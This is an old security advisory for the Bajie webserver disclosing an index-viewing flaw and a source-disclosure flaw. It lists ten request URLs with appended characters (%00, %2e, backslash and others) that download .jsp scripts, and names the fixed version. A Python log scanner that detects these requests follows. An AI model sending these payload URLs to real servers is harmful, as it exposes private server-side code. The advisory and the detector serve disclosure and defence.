#######################################################################

                             Luigi Auriemma

Application:  Bajie webserver
              http://viscomp.utdallas.edu/FACADE/websrv/
Versions:     <= 0.95zh
Platforms:    any
Bugs:         - index viewing
              - server scripts download
Exploitation: remote, via browser
Date:         16 Aug 2002
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's website:

"bj server is a fast jspservlet engine and a stand alone http web
server. It is the smallest of this kind, support a wide range of
features. It can also act as a servlet/jsp engine plugin for apache or
IIS via AJP"


#######################################################################

=======
2) Bugs
=======


-------------
Index viewing
-------------

An attacker can view the index of a specific web directory even if the
index file exists.
This happens only when the "show index" option is enabled.


-----------------------
Server scripts download
-----------------------

An attacker can download all the server-side scripts (.jar or .jsp, for
example) in the webserver root directory (htdocs) simply by adding some
special characters after the name of the file.


#######################################################################

===========
3) The Code
===========


http://SERVER/jsp/hello.jsp%00
http://SERVER/jsp/hello.jsp%20
http://SERVER/jsp/hello.jsp%2b
http://SERVER/jsp/hello.jsp+
http://SERVER/jsp/hello.jsp%2e
http://SERVER/jsp/hello.jsp.
http://SERVER/jsp/hello.jsp%2f
http://SERVER/jsp/hello.jsp/
http://SERVER/jsp/hello.jsp%5c
http://SERVER/jsp/hello.jsp\


#######################################################################

======
4) Fix
======


0.95zm


#######################################################################
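
The request shapes listed in section 3 leave a recognisable trace in access logs: a script name followed only by the appended characters. The Python below is an added example, not part of the original advisory or of the Bajie code; it assumes Common Log Format lines, and the names SCRIPT_EXTS, TRAILERS, trailing_suffix and scan are hypothetical.

```python
import re
from urllib.parse import unquote

# Script extensions named in the advisory; extend for your own site (assumption).
SCRIPT_EXTS = (".jsp", ".jar")
# The appended characters listed in the advisory, after percent-decoding.
TRAILERS = "\x00 +./\\"
# Request line of a Common Log Format entry: "METHOD target HTTP/x.y"
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>.+) HTTP/[0-9.]+"')


def trailing_suffix(target):
    """Return the characters appended after a script name, or None."""
    path = target.split("?", 1)[0]
    # unquote() decodes %xx only; a literal '+' in a path stays '+'.
    decoded = unquote(path, encoding="latin-1")
    stripped = decoded.rstrip(TRAILERS)
    suffix = decoded[len(stripped):]
    if suffix and stripped.lower().endswith(SCRIPT_EXTS):
        return suffix
    return None


def scan(lines):
    """Return (line_number, target, suffix) for each matching log entry."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if m:
            suffix = trailing_suffix(m.group("target"))
            if suffix is not None:
                hits.append((n, m.group("target"), suffix))
    return hits


# Constructed sample log lines (Common Log Format), not from a real server.
SAMPLE = [
    '192.0.2.10 - - [16/Aug/2002:10:00:01 +0000] "GET /jsp/hello.jsp HTTP/1.0" 200 312',
    '192.0.2.10 - - [16/Aug/2002:10:00:02 +0000] "GET /jsp/hello.jsp%00 HTTP/1.0" 200 845',
    '192.0.2.10 - - [16/Aug/2002:10:00:03 +0000] "GET /jsp/hello.jsp%2e HTTP/1.0" 200 845',
    '192.0.2.11 - - [16/Aug/2002:10:00:04 +0000] "GET /jsp/hello.jsp\\ HTTP/1.0" 200 845',
    '192.0.2.12 - - [16/Aug/2002:10:00:05 +0000] "GET /index.html HTTP/1.0" 200 1024',
    '192.0.2.12 - - [16/Aug/2002:10:00:06 +0000] "GET /jsp/hello.jsp?name=a+b HTTP/1.0" 200 320',
]

if __name__ == "__main__":
    for n, target, suffix in scan(SAMPLE):
        print(f"line {n}: {target!r} has appended {suffix!r}")
```

A trailing "/" after a script name can be legitimate extra path information on some servers, so hits of that kind need a look at the response size or content type before being treated as a disclosure.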